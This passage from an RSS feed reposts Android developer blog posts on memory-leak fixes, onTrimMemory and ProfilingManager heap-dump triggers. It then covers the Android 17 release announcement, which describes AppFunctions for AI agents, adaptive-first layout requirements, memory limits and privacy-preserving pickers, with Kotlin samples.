                        <p dir="ltr"><span face="'Google Sans',sans-serif">Compose-based example</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">View-based example</span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Leaking Context</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Example:</span><br><span face="'Google Sans',sans-serif">Passing LocalContext.current to a ViewModel</span></p>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Fix:</span><br><span face="'Google Sans',sans-serif">Keep <code>Context</code> dependent logic within the UI layer. For non-UI layers, refactor to use <a href="https://developer.android.com/training/dependency-injection">dependency injection</a> or observe UI state using <a href="https://developer.android.com/kotlin/flow">Kotlin flow</a>.</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Example:</span><br><span face="'Google Sans',sans-serif">Storing an <code>Activity</code> in a companion object or static variable.</span></p>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Fix:</span><br><span face="'Google Sans',sans-serif">Don’t hold static references to UI components. Refactor to use <a href="https://developer.android.com/training/dependency-injection">dependency injection</a> or observe UI state using <a href="https://developer.android.com/kotlin/flow">Kotlin flow</a>.</span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Leaking Listeners</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Example:</span><br><span face="'Google Sans',sans-serif">Using <code>DisposableEffect</code> to start a listener but leaving <code>onDispose</code> empty.</span></p>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Fix:</span><br><span face="'Google Sans',sans-serif">Perform the unregistration and <a href="https://developer.android.com/develop/ui/compose/side-effects#disposableeffect">cleanup logic</a> inside the <code>onDispose</code> block.</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Example:</span><br><span face="'Google Sans',sans-serif">Registering for SensorManager updates and forgetting to unregister.</span></p>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Fix:</span><br><span face="'Google Sans',sans-serif">Manually call <code>unregisterListener()</code> in <code>onStop()</code> or <code>onDestroy()</code> lifecycle.</span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Leaking Views</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Example:</span><br><span face="'Google Sans',sans-serif">Holding a reference to a legacy <code>View</code> inside an <code>AndroidView</code> without a release strategy.</span></p>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Fix:</span><br><span face="'Google Sans',sans-serif">Use the <code>release</code> block of the <code>AndroidView</code> composable to clean up the legacy <code>View</code>.</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Example:</span><br><span face="'Google Sans',sans-serif">Keeping a reference to a view binding object after the <code>Fragment</code> is destroyed.</span></p>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Fix:</span><br><span face="'Google Sans',sans-serif">Set the binding variable to <code>null</code> inside the <code>onDestroyView</code>() lifecycle method.</span></p>
                    </td>
                </tr>
            </tbody>
        </table>
    </div>
</div>

<h3>Trim memory when app leaves visible state</h3>
<p>Android can reclaim memory from your app or stop your app entirely if necessary to free up memory for critical tasks, as explained in <a href="https://developer.android.com/topic/performance/memory-overview" target="_blank">Overview of memory management</a>. Android will usually reclaim memory from your app when it’s not visible to the user, such as by discarding some of your app’s code and data pages in memory or compressing your heap allocations. When the user resumes your app and your app tries to access some memory that’s been reclaimed, the OS will swap that memory back in on demand. This swapping behavior can be slow, and cause unexpected jank or stutters in your app.</p>
<p>If you leave it to the OS to decide what memory to reclaim from your app, you may find that the OS reclaimed memory that you’ll need shortly after resuming your app. Instead, your app can voluntarily discard memory allocations that it can regenerate later, on demand and at a low cost. To do so, you can implement the <code>ComponentCallbacks2</code> interface. You can implement <code>onTrimMemory</code> in your <code>Activity</code>, <code>Fragment</code>, <code>Service</code>, or even your custom <code>Application</code> class. Using it in the <code>Application</code> class is highly effective for global cache management.</p>
<p>The provided <a href="https://developer.android.com/reference/android/content/ComponentCallbacks2#onTrimMemory(int)" target="_blank">onTrimMemory()</a> callback method notifies your app of lifecycle or memory-related events that present a good opportunity for your app to voluntarily reduce its memory usage.</p>
<p>In terms of memory lifecycle management, your implementation should focus <b>exclusively</b> on <code>TRIM_MEMORY_UI_HIDDEN</code> and <code>TRIM_MEMORY_BACKGROUND</code>. Since Android 14, the system has ceased delivering notifications for other legacy constants, which were formally deprecated in Android 15.</p>
<p><code>TRIM_MEMORY_UI_HIDDEN</code>: This signal indicates that your application's UI has transitioned out of the user's view. This provides an opportunity to release substantial memory allocations tied strictly to the interface—such as Bitmaps, video playback buffers, or complex animation resources.</p>
<p><code>TRIM_MEMORY_BACKGROUND</code>: At this level, your process is residing in the background and is now a candidate for termination to satisfy the system's global memory needs. To extend the duration your process remains in the cached state, and reduce the number of app cold starts, you should aggressively release any resources that can be easily reconstructed once the user resumes their session.</p>

<pre><code>import android.content.ComponentCallbacks2
// Other import statements.

class MainActivity : AppCompatActivity(), ComponentCallbacks2 {

    /**
     * Release memory when the UI becomes hidden or when system resources become low.
     * @param level the memory-related event that is raised.
     */
    override fun onTrimMemory(level: Int) {

        if (level &gt;= ComponentCallbacks2.TRIM_MEMORY_UI_HIDDEN) {
            // Release memory related to UI elements, such as bitmap caches.
        }

        if (level &gt;= ComponentCallbacks2.TRIM_MEMORY_BACKGROUND) {
            // Release memory related to background processing, such as by
            // closing a database connection.
        }
    }
}</code></pre>

<p>Note: The <code>onTrimMemory</code> integration may depend on SDK support. For instance, certain games rely on their game engine to enable this capability. Please check out the <a href="https://developer.android.com/games/optimize/memory-allocation" target="_blank">game memory optimization documents</a>.</p>

<h3>Advanced memory observability with ProfilingManager</h3>
<p>To catch and diagnose memory issues in the field that cannot be reproduced locally, you should leverage the <b>ProfilingManager API</b>. Introduced in Android 15, this advanced observability API allows you to programmatically collect real-user Perfetto profiles.</p>
<p>For teams that lack a dedicated infrastructure to manage and host performance artifacts, Crashlytics is exploring a specialized solution to streamline this workflow. They are inviting developers to <a href="https://docs.google.com/forms/d/e/1FAIpQLSe299a_zSNDfa164z7yyqoDjS05ZDRN86bAQKajuAOFEQ4G-w/viewform" target="_blank">provide feedback</a>.</p>

<p><b>Android 17 introduces new event-driven triggers</b>, most notably <code>TRIGGER_TYPE_OOM</code> and <code>TRIGGER_TYPE_ANOMALY</code>:</p>
<ul>
    <li>The <b>OOM trigger</b> automatically collects a Java heap dump at the exact moment an OutOfMemoryError crash occurs, providing precise allocation states. A collected OOM profile is provided the next time the app starts and registers the <code>registerForAllProfilingResults</code> callback.</li>
    <li>The <b>Anomaly trigger</b> detects severe performance issues, such as excessive binder spam or breached memory thresholds. The memory anomaly delivers a heap dump just prior to the system terminating the app.</li>
</ul>

<pre><code>  val profilingManager = 
applicationContext.getSystemService(ProfilingManager::class.java)
    val triggers = ArrayList<profilingtrigger>()  


    triggers.add(ProfilingTrigger.Builder(
                 ProfilingTrigger.TRIGGER_TYPE_ANOMALY))
    val mainExecutor: Executor = Executors.newSingleThreadExecutor()
    val resultCallback = Consumer<profilingresult> { profilingResult -&gt;
        if (profilingResult.errorCode != ProfilingResult.ERROR_NONE) {
            // upload profile result to server for further analysis          
            setupProfileUploadWorker(profilingResult.resultFilePath)
        } 

    profilingManager.registerForAllProfilingResults(mainExecutor, resultCallback)
    profilingManager.addProfilingTriggers(triggers)</profilingresult></profilingtrigger></code></pre>

<p>
    Once you’ve collected the heap dump, you can download the profile from the server, or locally via adb pull and drag and drop the file into the <a href="http://ui.perfetto.dev/" target="_blank">Perfetto UI</a>. To streamline your memory debugging workflow, use the <a href="https://perfetto.dev/docs/visualization/heap-dump-explorer" target="_blank">Heap Dump Explorer</a>, this is the new default view for heap dumps in Perfetto UI. This tool provides an intuitive interface for inspecting Java heap dumps, allowing you to visualize object allocation hierarchies, compute retained memory sizes, and identify the shortest path from garbage collection root. By leveraging the Heap Dump Explorer, you can rapidly pinpoint memory leaks, bloated retained objects such as excessive bitmap allocations, and analyze heap object allocations all in one place.
</p>

<div class="separator">
    <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhobASfyUbXdAYD_MOjREv7RUhCwoNJ9sB4QDSImRfA0UrALJqwQ2ovgAF7YRt3f26UeZoIQa-yDxiSDO84gxv1XkQ8acf8E795-IgAe4tl8AM_7m7nSEuj7t_rhtpgM3f-76_lEh-k7Rltku79-VCuIDN_2Q9DRjJyouCKbxg4pDXHV2yey7V8WlG2jQM/s2048/pic5-perfettoheapdump-analyzer.png">
        <img border="0" data-original-height="1039" data-original-width="2048" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhobASfyUbXdAYD_MOjREv7RUhCwoNJ9sB4QDSImRfA0UrALJqwQ2ovgAF7YRt3f26UeZoIQa-yDxiSDO84gxv1XkQ8acf8E795-IgAe4tl8AM_7m7nSEuj7t_rhtpgM3f-76_lEh-k7Rltku79-VCuIDN_2Q9DRjJyouCKbxg4pDXHV2yey7V8WlG2jQM/s16000/pic5-perfettoheapdump-analyzer.png">
    </a>
</div>
<div>
    <i>Use the <a href="https://perfetto.dev/docs/visualization/heap-dump-explorer">Heap Dump Explorer</a>’s embedded flamegraph to visually inspect and navigate through objects with the highest heap allocations.</i>
</div>

<h3>Conclusion</h3>
<p>Optimizing bytecode with R8, adopting image loading best practices, and resolving memory leaks are critical steps toward delivering a high-quality user experience while managing resources effectively under pressure. Adopting these proactive measures helps maintain app stability and performance, preventing unexpected terminations while safeguarding user context. To further your performance expertise, explore our revised <a href="https://developer.android.com/topic/performance/memory" target="_blank">memory guidance</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Android 17 is here]]></title>
<description><![CDATA[Posted by Matthew McCullough, VP of Product Management, Android DeveloperToday we're releasing Android 17 and making it available on most supported Pixel devices. Look for new devices running Android 17 in the coming months.

Android 17 marks the start of our transition to an intelligence system,...]]></description>
<link>https://tsecurity.de/de/3693505/android-tipps/android-17-is-here/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693505/android-tipps/android-17-is-here/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:36 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV7zuuXjulHty999mGDWY1kfL8Q9SXjYYWn-7JTpMfVdNP78eb5fW9shOpvVdEqK0WnNp7AhdO0qc7pXAaqcfTwXgOGsfZyqcQv8wyD-9niWBpZuP6ZAPHBSetWenN2lMlRS5wi2d71-n8RCYqrLsFhUCEvM7KeoGLnNaDbiyOZQ0vvyr0O580nXK4Vas/s2048/Metadata%20-%20Static.png"><div><i>Posted by Matthew McCullough, VP of Product Management, Android Developer</i></div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5KPJZylMSUXRpKFRUd6oM4fNdEoDRdJzdkzg69P_BVUuIDtXqCqTid6hGH40CoHRw7-f50HsT6rISArklGH982MM4K1jKU16SSymes4JPoE4qOZ5s1lLnkbInpUpdJGu5erAYmSgiefzkkOX_ng3AUJKOzzwC1WMTjk2DxLNia8R1C-ErWc7jT4VP8ew/s4209/Blogger%20Hero%20-%20White.png"><img border="0" data-original-height="1253" data-original-width="4209" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5KPJZylMSUXRpKFRUd6oM4fNdEoDRdJzdkzg69P_BVUuIDtXqCqTid6hGH40CoHRw7-f50HsT6rISArklGH982MM4K1jKU16SSymes4JPoE4qOZ5s1lLnkbInpUpdJGu5erAYmSgiefzkkOX_ng3AUJKOzzwC1WMTjk2DxLNia8R1C-ErWc7jT4VP8ew/s16000/Blogger%20Hero%20-%20White.png"></a></div><br><p><br></p><p>Today we're releasing Android 17 and making it available on most supported Pixel devices. Look for new devices running Android 17 in the coming months.</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjaHGBWXu3yvdXZ-wYQgN6DjN5TEMRIYDJvQDZTOybRZFWsAMhqhl14b9UZmrlXlEIRDioqRc8m3xRjOnQHJPoICkVpCho4qrmKihPbu_SB7dGVNKwlAaX6eWdjLF4VUdGyzGfxtW0ziFggj63e778VVo38qpMKar4E1wuw0MiPCBvBdrTTXCgI1XD04Q/s1080/AfD-Android-17.gif"><img border="0" data-original-height="1080" data-original-width="1080" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjaHGBWXu3yvdXZ-wYQgN6DjN5TEMRIYDJvQDZTOybRZFWsAMhqhl14b9UZmrlXlEIRDioqRc8m3xRjOnQHJPoICkVpCho4qrmKihPbu_SB7dGVNKwlAaX6eWdjLF4VUdGyzGfxtW0ziFggj63e778VVo38qpMKar4E1wuw0MiPCBvBdrTTXCgI1XD04Q/s320/AfD-Android-17.gif" width="320"></a></div>

<p>Android 17 marks the start of our transition to an intelligence system, putting your apps at the center. It's shifting to an adaptive-first development standard by introducing mandatory large-screen resizability, all while delivering next-generation privacy, security, media, camera, and performance. We'll cover all that in this post, as well as how we're bringing together next generation tools, libraries, and agent skills to help your apps embrace the opportunity.</p>

<p>Throughout the past year, from our Canary channel to our Beta releases, we’ve collaborated with you in the developer community to build a platform you and your users can trust. To that end, this moment marks the availability of the source code at the <a href="https://source.android.com/">Android Open Source Project</a> (AOSP). This allows you to <a href="https://cs.android.com/">examine the source code</a> for a deeper understanding of how Android works.</p>

<p>Let's dive deeper into Android 17.</p>

<h3>An intelligence system</h3>

<p>With deep integration between hardware, software and AI, we’re transforming Android from an operating system to an intelligence system. It's about delivering new helpful experiences that anticipate user needs, and it brings more opportunities for engagement with your apps. To that end, Android 17 expands the capabilities of AppFunctions, a platform API with a corresponding Jetpack library. It allows you to contribute your app's unique capabilities as orchestratable "tools" for Android MCP, the on-device equivalent of the <a href="https://modelcontextprotocol.io/">Model Context Protocol</a>. AI agents and assistants (like Google Gemini) can discover and execute AppFunctions to perform workflows on behalf of the user with direct access to the app's local state.</p>

<p>The Jetpack library, currently in alpha, makes adding AppFunctions as easy as annotating a class and adding KDoc comments.</p>

<pre><code>/**
 * A note app's [AppFunction]s.
 */
class NoteFunctions(
    private val noteRepository: NoteRepository
) {
    /**
     * Adds a new note to the app.
     *
     * @param appFunctionContext The execution context.
     * @param title The title of the note.
     * @param content The note's content.
     */
    @AppFunction(isDescribedByKDoc = true)
    suspend fun createNote(
        appFunctionContext: AppFunctionContext,
        title: String,
        content: String
    ): Note {
        return noteRepository.createNote(title, content)
    }
}</code></pre>

<p>We’ve also launched an <a href="http://github.com/android/skills/tree/main/on-device/appfunctions">AppFunctions agent skill</a> that analyzes your app’s key workflows, automatically generates the required Kotlin code, optimizes your KDocs for LLM tool-calling, and provides ADB commands for testing and debugging.</p>

<p>The Gemini integration is currently in a private preview with trusted testers, but you can begin preparing your apps now. In addition to ADB commands to execute your AppFunctions, we've provided a <a href="http://github.com/android/appfunctions/releases/initial">test agent app</a> that includes an interface to discover and execute your app functions and simulate an AI agent integration. Join our integration early access program at <a href="http://goo.gle/eap-af">goo.gle/eap-af</a> for a chance to be among the first apps to deploy AppFunctions to production.</p>

<h3>Adaptive-first</h3>
<p>Your users no longer rely on a single form factor; they transition between phones, foldables, tablets, laptops, automotive displays, and immersive XR environments. Now, with over <a href="https://developer.android.com/blog/posts/adaptive-development-for-the-expanding-android-ecosystem">580 million large screen devices</a> in the hands of users and the <a href="https://blog.google/products-and-platforms/platforms/android/meet-googlebook/">forthcoming launch of Googlebooks</a>, the next generation of ChromeOS built on the Android stack, adaptive is no longer just a technical goal. It’s a massive opportunity to reach highly engaged users, which is one of the reasons we're shifting to an <a href="https://developer.android.com/adaptive-apps">adaptive-first development standard</a>.</p>

<h2>No resizability/orientation restrictions on large screens</h2>
<p>To ensure apps deliver a premium experience across all form factors, including mobile devices running in desktop mode on connected displays, Android 17 (API level 37) removes the developer opt-out for orientation and resizability restrictions on <a href="https://developer.android.com/guide/topics/large-screens">large screen devices</a> (sw &gt; 600 dp) for apps targeting API level 37. The system will ignore legacy manifest attributes and runtime APIs, including screenOrientation, setRequestedOrientation(), resizeableActivity=false, and aspect ratio constraints (minAspectRatio/maxAspectRatio). Games (based on <a href="https://support.google.com/googleplay/android-developer/answer/9859673?hl=en">app category</a> in Google Play) remain exempt. Your app must be ready to adapt to any window size, respect the user's preferred device posture, and support free-form windowing natively.</p>

<h2>Next-gen multitasking: App Bubbles, Bubble Bar, and desktop interactive PiP</h2>
<p>Android 17 introduces powerful new windowing capabilities that redefine how users multitask, demanding even greater layout flexibility from your apps:</p>
<ul>
    <li><strong>App Bubbles:</strong> Moving beyond the messaging bubbles API, users can now transform any app into a floating bubble by long-pressing its icon on the launcher. This feature is available across phones, foldables, and tablets, enabling lightweight multitasking for any workflow.</li>
    <li><strong>The Bubble Bar:</strong> On large screens (tablets and foldables), the system taskbar now includes a dedicated Bubble Bar to organize, transition between, and dock these floating app bubbles.</li>
    <li><strong>Desktop interactive PiP:</strong> In desktop environments, Android 17 introduces interactive Picture-in-Picture (PiP). Unlike traditional PiP windows which are read-only, these pinned windows remain fully interactive while staying always-on-top of other application windows.</li>
</ul>

<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg12FRQ31sUiyMj_ZalamTRI4VyI2tMXYKEoRy6b-u0Het272IDbRhznXot7b8AvFJEX-ubw_-pNxyS5JTKPUTBj1CNXwIYkTE906vembUcHeyGzE4Lb72WRyGNF7dOP_aBssNeCplOjEnKAc3d3hkak81LOpG0g9Hlep0AvC11MjdJ1MkqAp7ViUCu2bw/s1600/Bubbles%20(1).gif"><img border="0" data-original-height="1600" data-original-width="1544" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg12FRQ31sUiyMj_ZalamTRI4VyI2tMXYKEoRy6b-u0Het272IDbRhznXot7b8AvFJEX-ubw_-pNxyS5JTKPUTBj1CNXwIYkTE906vembUcHeyGzE4Lb72WRyGNF7dOP_aBssNeCplOjEnKAc3d3hkak81LOpG0g9Hlep0AvC11MjdJ1MkqAp7ViUCu2bw/s16000/Bubbles%20(1).gif"></a></div><p><i>App Bubbles and Bubble Bar in action</i></p>

<h2>Activity recreation updates</h2>
<p>To prevent disruptive state loss and stutter, Android 17 updates the default behavior for Activity recreation. The system will no longer restart activities by default for typical configuration changes that do not require a full UI redraw (including <a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_keyboard">CONFIG_KEYBOARD</a>, <a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_keyboard_hidden">CONFIG_KEYBOARD_HIDDEN</a>, <a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_navigation">CONFIG_NAVIGATION</a>, <a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_touchscreen">CONFIG_TOUCHSCREEN</a>, and <a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_color_mode">CONFIG_COLOR_MODE</a>).<br>
Instead, running activities will receive these updates via onConfigurationChanged(), enabling smooth transitions. If your application explicitly relies on a full restart to reload resources for these changes, you must now explicitly opt-in using the new <a href="https://developer.android.com/reference/kotlin/android/R.attr#recreateonconfigchanges">android:recreateOnConfigChanges</a> manifest attribute.</p>

<h2>Continue On</h2>
<p>Android 17 adds Continue On to help users seamlessly transition a task between Android devices. The user sees a suggestion for the most recently opened app from their mobile device in their tablet taskbar, providing a one-tap affordance to launch the app and deep-link where they left off. Continue on can support app-to-web transitions, including falling back to using the web if the app isn't installed.</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc8K42DCZ0VTYpFhTlEazp9_AthhqYdm786k1NFolZrP7HwXk2QlF7UV1CU7ECK9N-CiHSfSbH_E2_cXwL3zUuesP-shpa1nau5QmVWDOQeErnCMtvZUw_wwAHNewZZ5S3811f0n_FNoX4U9kyptZQONM_eDB1AAHaoFjMFgTCC7G1d0X2iRo1MN8sev0/s1920/Continue%20On.png"><img border="0" data-original-height="1200" data-original-width="1920" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc8K42DCZ0VTYpFhTlEazp9_AthhqYdm786k1NFolZrP7HwXk2QlF7UV1CU7ECK9N-CiHSfSbH_E2_cXwL3zUuesP-shpa1nau5QmVWDOQeErnCMtvZUw_wwAHNewZZ5S3811f0n_FNoX4U9kyptZQONM_eDB1AAHaoFjMFgTCC7G1d0X2iRo1MN8sev0/s16000/Continue%20On.png"></a><i>Handoff Suggestion on a Tablet</i></div><p><br></p>

<pre><code>class MyHandoffActivity : Activity() {

    ...

  override fun onCreate(savedInstanceState: Bundle?) {
    super.onCreate(savedInstanceState)
    // Do stuff
    ...
    // Enable handoff
    setHandoffEnabled(true, null)
  }

  // Override and implement onHandoffActivityDataRequested
  override fun onHandoffActivityDataRequested(handoffRequestInfo: HandoffActivityDataRequestInfo) : HandoffActivityData {
    // Create and return handoff data
  }
}</code></pre>

<h2>Go adaptive-first with Jetpack Compose</h2>
<p>To help you adapt your apps to meet the new Android 17 requirements, we've launched the <a href="https://github.com/android/skills/tree/main/jetpack-compose/adaptive">Jetpack Compose adaptive skill</a>. This AI-powered developer workflow helps you implement the best adaptive practices:</p>
<ul>
    <li><strong>Adaptive navigation:</strong> Automatically transition between bottom navigation bars on mobile and edge-anchored navigation rails on large screens using NavigationSuiteScaffold from the Material 3 Adaptive library.</li>
    <li><strong>Multi-pane layouts:</strong> Implement list-detail and supporting pane layouts natively using Navigation 3 Scenes (ListDetailSceneStrategy and SupportingPaneSceneStrategy) instead of fragile fragment transactions.</li>
    <li><strong>FlexBox &amp; Grid APIs:</strong> Utilize Compose 1.11's dynamic layout components to easily adjust row and column spans on the fly, ensuring your content always fills the space beautifully.</li>
    <li><strong>Advanced non-touch input:</strong> Leverage Compose 1.11's enhanced trackpad and mouse support, including native focus rings and new APIs (like TrackpadInjectionScope and performTrackpadInput) to easily test and deliver a true "laptop-class" experience on Googlebooks and Desktop Mode.</li>
    <li><strong>Dynamic window states:</strong> Leverage Compose's reactive state model to seamlessly adapt your UI when the app transitions from full screen to a floating App Bubble or an interactive Desktop PiP window, ensuring a premium experience even at minimal dimensions.</li>
</ul>

<h2>Android is Compose-first</h2>
<p>Compose offers the easiest way to build adaptive apps, and that's just one of the <a href="https://developer.android.com/develop/ui/compose/first#why-compose-first">many reasons</a> we believe that all Android UI should be built with Compose. To that end, <a href="https://developer.android.com/develop/ui/compose/first">Android development is now Compose-first</a>. All new Android APIs, libraries, tools, and developer guidance will be built exclusively for Jetpack Compose. Legacy View components (in the android.widget package) and View-based Jetpack libraries (like Fragments, RecyclerView, and ViewPager) are now in maintenance mode. They will receive only critical bug fixes, and no new features.</p>

<blockquote>
    <p><strong>TIP</strong><br>
    Ready to migrate? Use our AI-driven <a href="https://developer.android.com/develop/ui/compose/migrate/migrate-xml-views-to-jetpack-compose">XML to Compose Migration Skill</a> to automatically analyze your legacy View layouts and convert them into highly-adaptive Compose code.</p>
</blockquote>

<h3>Performance &amp; efficiency</h3>
<p>App performance means a smooth user interface, fast app start times, and efficient multitasking; Android 17 has impactful improvements in all of these areas.</p>

<h2>App memory limits</h2>
<p>Memory usage is one of the silent foundations of overall performance. When a foreground app or service grows unchecked, memory management spikes CPU and battery utilization and eventually leads to the termination of other well-behaved cached apps and background jobs, ultimately forcing slower cold starts and impaired multitasking. </p>

<p>Starting in Android 17, the system will enforce strict app memory limits based on a device's total RAM, abruptly terminating offending processes. New things to help you navigate these tighter requirements:</p>
<ul>
    <li><strong>R8 Optimizer:</strong> The R8 optimizer significantly reduces your app's bytecode memory footprint by shrinking classes, methods, and fields into shorter names, and stripping out unused code and resources. Use R8 in full mode along with the new <a href="https://developer.android.com/topic/performance/app-optimization/r8-configuration-analyzer">R8 configuration analyzer</a> to make sure your app is getting the most from R8.<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQePgjeISaotpA-miDPKel-qgAYtepLjMMBaiKZQqTf_iYRTJurn_iAFdC7utLnKRKAh9OhSjF_D83skA2PPg7xts0ORX7aVxBkoax6b9uEPqTlGiY_sh8Xv7U1pr0h4Nm8FLo-h3IJD8FhTJc-gOtpBwyLCnDBUPRJAuaaBjsIOhvUmTXFSna0ykksak/s2048/R8%20Configuration%20Analyzer.png"><img border="0" data-original-height="397" data-original-width="2048" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQePgjeISaotpA-miDPKel-qgAYtepLjMMBaiKZQqTf_iYRTJurn_iAFdC7utLnKRKAh9OhSjF_D83skA2PPg7xts0ORX7aVxBkoax6b9uEPqTlGiY_sh8Xv7U1pr0h4Nm8FLo-h3IJD8FhTJc-gOtpBwyLCnDBUPRJAuaaBjsIOhvUmTXFSna0ykksak/s16000/R8%20Configuration%20Analyzer.png"></a></div></li></ul><div><span><u><br></u></span></div><div><span><u><br></u></span></div><div><br></div><div><br></div><div>The R8 Configuration Analyzer</div><ul><li><strong>LeakCanary in Android Studio Panda:</strong> The profiler now features native LeakCanary integration as a dedicated task, fully integrated with your IDE and source code.</li>
    <li><strong>ApplicationExitInfo:</strong> If your app is terminated by these limits, getDescription() from ApplicationExitInfo will return "MemoryLimiter:AnonSwap".</li>
    <li><strong>On-Device Anomaly Detection:</strong> Part of ProfilingManager, you can leverage trigger-based profiling using TRIGGER_TYPE_ANOMALY to automatically capture heap dumps when the memory limit is reached.</li>
</ul>

<pre><code>val profilingManager = applicationContext
   .getSystemService(ProfilingManager::class.java)

val triggers = ArrayList&lt;ProfilingTrigger&gt;().apply {
  add(ProfilingTrigger.Builder(
    ProfilingTrigger.TRIGGER_TYPE_ANOMALY).build())
}
profilingManager.addProfilingTriggers(triggers)</code></pre>

<p>And, we're working to surface more in-field memory metrics to you within Google Play Console.</p>

<h2>Generational garbage collection</h2>
<p><a href="https://developer.android.com/about/versions">Android 17</a> introduces more frequent, less resource-intensive young-generation collections to <a href="https://developer.android.com/guide/platform#art">ART</a>'s Concurrent Mark-Compact garbage collector (GC). By separating short-lived objects from stable, long-lived ones, the system runs frequent, lightweight "young-generation" sweeps rather than expensive full-heap scans, drastically reducing CPU usage, power drain, and UI stutter. Our testing has shown significant improvements in GC interference with application threads and a reduction in the maximum memory resident set size (RSS). ART improvements are also available to over a billion devices running Android 12 (API level 31) and higher through Google Play System updates.</p>

<h2>Lock-Free MessageQueue</h2>
<p>For apps targeting SDK 37 or higher, the core <a href="https://developer.android.com/reference/android/os/MessageQueue"><b>android.os.MessageQueue</b></a> now implements a lock-free architecture, significantly reducing missed frames, improving app startup time, and radically improving the performance of busy queues in multithreaded scenarios. Note: This can break apps that use reflection on private <a href="https://developer.android.com/reference/android/os/MessageQueue"><b>MessageQueue</b></a> fields and methods.  The <a href="https://developer.android.com/reference/android/os/TestLooperManager#peekWhen()"><b>peekWhen</b></a> and <b><a href="https://developer.android.com/reference/android/os/TestLooperManager#poll()">poll</a> </b>APIs have been added to <a href="https://developer.android.com/reference/android/os/TestLooperManager"><b>TestLooperManager</b></a> for instrumentation testing without relying on <a href="https://developer.android.com/reference/android/os/MessageQueue"><b>MessageQueue</b></a> internals.</p>

<h2>Static final fields now truly final</h2>
<p>Starting from Android 17, apps targeting SDK 37 or higher won’t be able to modify “static final” fields, allowing the runtime to apply performance optimizations more aggressively. An attempt to do so via reflection (or deep reflection) will lead to an IllegalAccessException being thrown. Modifying them via JNI’s <b><code>SetStatic&lt;Type&gt;Field</code></b> methods family will immediately crash the application.</p>

<h2>Custom notification view restrictions</h2>
<p>To reduce memory usage we are further restricting the size of <a href="https://developer.android.com/develop/ui/views/notifications/custom-notification">custom notification views</a>. This update closes a loophole that allows apps to bypass existing limits using URIs. This behavior is gated by the target SDK version and takes effect for apps targeting API 37 and higher.</p>

<h3>Privacy &amp; Security</h3>
<p>Maintaining user trust is at the heart of the Android ecosystem. Android 17 introduces robust features that protect sensitive data while simplifying user experiences.</p>

<h2>Privacy-preserving choices</h2>
<p>Historically, apps required broad, permanent permissions to access information like contacts, precise location and media files. Android 17 continues the shift toward privacy-preserving choices that grant temporary, session-based access only to the data the user explicitly selects:</p>
<ul>
  <li><strong>System-Level Contact Picker:</strong> Utilizing <code>ACTION_PICK_CONTACTS</code>, apps can request temporary access only to specific fields (e.g., email or phone number) chosen by the user, eliminating the need for the broad <code>READ_CONTACTS</code> permission. It also fully supports work/personal profile separation.</li>
    <li><strong>Customizable Photo Picker aspect ratio:</strong> Using<b><code>PhotoPickerUiCustomizationParams</code></b>, you can customize the system photo picker to show thumbnails in portrait mode. This is perfect for apps that always display photos and videos in portrait such as video based social media apps.</li>
    <li><strong>System-rendered Location Button:</strong> A new system-rendered location button that you can embed in your app grants precise location access for the current session only.</li>
    <li><strong>EyeDropper API:</strong> A new system-level API, <code>ACTION_OPEN_EYE_DROPPER</code>, allows your app to create a system-powered eyedropper enabling the user to select color from any pixel on the display. This provides a secure, privacy-preserving color-picking experience that eliminates the need for broad, sensitive screen capture or media projection permissions.</li>
</ul>

<pre><code>val eyeDropperLauncher = registerForActivityResult(ActivityResultContracts.StartActivityForResult()) { result -&gt;
   if (result.resultCode == Activity.RESULT_OK) {
       val color = result.data?.getIntExtra(Intent.EXTRA_COLOR, Color.BLACK)
       // Use the picked color in your app
   }
}
fun launchColorPicker() {
   val intent = Intent(Intent.ACTION_OPEN_EYE_DROPPER)
   eyeDropperLauncher.launch(intent)
